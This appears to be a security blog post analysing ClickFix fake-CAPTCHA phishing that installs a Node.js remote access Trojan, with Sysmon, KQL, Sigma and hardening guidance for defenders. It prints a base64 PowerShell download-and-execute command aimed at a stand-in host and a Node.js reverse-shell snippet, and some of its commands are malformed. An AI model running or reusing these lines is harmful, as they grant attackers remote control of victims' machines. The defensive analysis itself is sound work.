Listen to this Post
Introduction:
The ClickFix phishing technique, which gained notoriety in early 2025 for distributing malware like LegionLoader and LummaStealer, has now evolved to deliver a sophisticated Node.js-based remote access Trojan (RAT) targeting Windows systems. Attackers leverage fake CAPTCHA prompts to deceive victims into executing a hidden, base64-encoded PowerShell command that silently downloads a self-contained MSI installer equipped with a full Node.js runtime environment, enabling powerful post-exploitation capabilities.
Learning Objectives:
- Understand the ClickFix delivery vector and how fake CAPTCHA prompts are used to trigger malicious PowerShell execution.
- Analyze the Node.js-based RAT’s behavior, including its evasion techniques and communication methods.
- Implement detection, mitigation, and forensic analysis strategies using Windows and Linux commands, Sysmon, and EDR rules.
You Should Know:
1. Decoding the Base64 PowerShell Command
The initial attack vector relies on a social-engineered CAPTCHA page that prompts the user to press a key combination (e.g., Win+R and Ctrl+V) to paste and run a malicious PowerShell command. The command is hidden as a base64-encoded string. To analyze it, extract the encoded portion and decode it using the following steps.
Step‑by‑step guide to decode the malicious PowerShell command:
- On a safe analysis machine (isolated VM), capture the full PowerShell command from the fake CAPTCHA page or email attachment.
- Copy the base64 string (typically a long string after
-EncodedCommand). - Use a Linux terminal or Windows PowerShell to decode:
Linux command:
echo "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQALgBtAHMAaQAnACkA" | base64 -d
Windows PowerShell:
- The decoded output typically reveals a command that invokes `Invoke-Expression` or `Start-Process` to download and execute an MSI installer from a remote server.
2. Analyzing the MSI Installer and Node.js Runtime
The decoded PowerShell downloads a self-contained MSI package that includes a portable Node.js runtime, eliminating dependency on the host system’s Node.js installation. This allows the RAT to run across different Windows versions without raising suspicion.
Step‑by‑step guide to extract and inspect the MSI:
- Retrieve the MSI URL from the decoded command (e.g., `http://malicious.com/payload.msi`).
- Download the MSI in a sandbox environment.
- Use `msiexec` to extract contents without installing:
Windows command (admin):
msiexec /a payload.msi /qb TARGETDIR=C:\ExtractedMSI
- Navigate to the extracted directory and look for a folder containing `node.exe` and a JavaScript file (e.g., `index.js` or
agent.js). - Examine the JavaScript code for C2 communication, persistence mechanisms, and RAT capabilities (file upload, command execution, keylogging).
Example suspicious Node.js code snippet:
const net = require('net');
const exec = require('child_process').exec;
const client = net.connect({port: 443, host: 'c2.server.com'});
client.on('data', function(cmd) {
exec(cmd.toString(), (err, out) => client.write(out));
});
3. Network Indicators and C2 Communication
The Node.js RAT typically uses encrypted channels (HTTPS/WSS) or raw TCP sockets over non-standard ports. Key indicators include unusual outbound connections from `node.exe` processes, especially to newly registered domains or IPs with low reputation.
Step‑by‑step guide to detect C2 traffic:
- Use `netstat` to monitor active connections:
Windows:
netstat -ano | findstr :443
- Correlate with process IDs (PID) using Task Manager or
tasklist:
tasklist /fi "PID eq 1234"
- On Linux (for network forensics), use `tcpdump` to capture traffic from the infected host:
sudo tcpdump -i eth0 host <suspicious_ip> -w capture.pcap
- Analyze PCAPs with Wireshark, filtering for `tcp.port == 443` and looking for JavaScript payloads or WebSocket upgrades.
4. Detecting Node.js RATs with Sysmon and EDR
To proactively detect execution of Node.js-based malware, configure Sysmon to log process creation, network connections, and file hashes. Node.js RATs often run `node.exe` from temporary or unusual paths.
Step‑by‑step Sysmon configuration:
- Install Sysmon from Microsoft Sysinternals.
- Use a configuration file (
sysmon-config.xml) that includes rules for:
<ProcessCreate onmatch="include"> <Image condition="contains">node.exe</Image> <CommandLine condition="contains">.js</CommandLine> </ProcessCreate> <NetworkConnect onmatch="include"> <Image condition="contains">node.exe</Image> <DestinationPort condition="is">443</DestinationPort> </NetworkConnect>
- Launch Sysmon:
sysmon64.exe -accepteula -i sysmon-config.xml
- Monitor Event IDs 1 (process creation) and 3 (network connection) in Event Viewer or forward to a SIEM.
EDR hunting query example (KQL):
DeviceProcessEvents | where FileName == "node.exe" | where ProcessCommandLine contains ".js" | where FolderPath contains @"\Temp\" or FolderPath contains @"\AppData\Local\Temp"
5. Mitigation Strategies: Application Control and PowerShell Logging
Preventing execution of such RATs requires layered defenses. The most effective controls are application whitelisting and comprehensive PowerShell logging.
Step‑by‑step mitigation:
- Enable PowerShell Script Block Logging (Windows Group Policy):
- Navigate to
Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell. - Enable “Turn on PowerShell Script Block Logging” and “Turn on PowerShell Transcription”.
-
Restrict PowerShell execution policy (prefer `Restricted` or
AllSigned):
Set-ExecutionPolicy Restricted -Scope LocalMachine
- Deploy AppLocker or WDAC to block execution of `node.exe` from writable directories (e.g.,
%TEMP%,%APPDATA%). Create a rule to allow only signed Node.js installers fromProgram Files. -
Network-level mitigation: Block known malicious IPs and domains via firewall or DNS filtering. Use threat intelligence feeds to update blocklists dynamically.
6. Linux/Windows Commands for Forensic Analysis
If an infection is suspected, collect artifacts from affected Windows systems using the following commands.
Collect running processes and network connections:
tasklist /v > processes.txt netstat -anob > connections.txt
Extract PowerShell history (user-level):
Get-Content (Get-PSReadlineOption).HistorySavePath
Search for downloaded MSI files in recent locations:
dir C:\Users\Downloads.msi /s /b dir C:\Windows\Temp.msi /s /b
On Linux (as analysis workstation), calculate hashes of suspicious files:
sha256sum payload.msi md5sum extracted.js
Submit hashes to VirusTotal or threat intel platforms.
7. Hardening Against ClickFix Techniques
User education is critical, but technical controls can reduce the risk of fake CAPTCHA interactions.
Step‑by‑step hardening:
- Disable clipboard access from web pages (modern browsers limit this, but legacy settings may allow). In Chrome/Edge, enable `Block third-party clipboard access` via policies.
- Use Group Policy to restrict the execution of clipboard-pasted commands – not directly feasible, but you can deploy PowerShell Constrained Language Mode:
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
- Implement browser extension controls to block known phishing domains hosting fake CAPTCHAs.
- Deploy endpoint detection rules that flag processes spawned from `cmd.exe` or `powershell.exe` with command lines containing `-EncodedCommand` and downloading `.msi` files.
Example Sigma rule for detection:
title: ClickFix PowerShell Download MSI status: experimental logsource: product: windows service: powershell detection: selection: ScriptBlockText|contains: - '-EncodedCommand' - 'DownloadString' - '.msi' condition: selection
What Undercode Say:
- Key Takeaway 1: ClickFix campaigns have rapidly evolved from delivering infostealers to full-featured RATs, leveraging legitimate Node.js runtime to evade static detection.
- Key Takeaway 2: Base64-encoded PowerShell commands remain a preferred obfuscation method; organizations must enable deep script block logging and monitor for suspicious `node.exe` execution from temporary directories.
- The shift to self-contained MSI installers with Node.js reflects a broader trend: malware authors are increasingly using cross-platform frameworks to simplify development and hinder analysis. Traditional antivirus struggles against such dynamically loaded JavaScript payloads. Defenders need to focus on behavior-based detection—monitoring parent-child process relationships (e.g., `powershell.exe` spawning `msiexec.exe` spawning
node.exe) and unusual outbound TLS traffic. Additionally, application whitelisting and restricting PowerShell to signed scripts only can break the attack chain at multiple points. Organizations should also integrate threat intelligence feeds that track newly registered domains used for MSI delivery. Finally, user awareness training must explicitly cover fake CAPTCHA tactics, as social engineering remains the most effective initial vector.
Prediction:
Over the next 12 months, threat actors will increasingly adopt Node.js and other JavaScript runtimes (e.g., Deno, Bun) for Windows and cross-platform malware, bypassing traditional PE-based detection. We expect to see ClickFix campaigns expand to macOS and Linux, using similar fake CAPTCHA prompts to deliver shell scripts or Electron-based RATs. Defenders will respond by deploying runtime containerization for browsers and enforcing stricter PowerShell execution policies, but the cat-and-mouse game will accelerate as attackers adopt AI-generated CAPTCHA lures that are nearly indistinguishable from legitimate ones. Organizations that fail to implement application control and robust PowerShell logging will remain highly vulnerable.
▶️ Related Video (86% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Varshu25 Nodejs – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
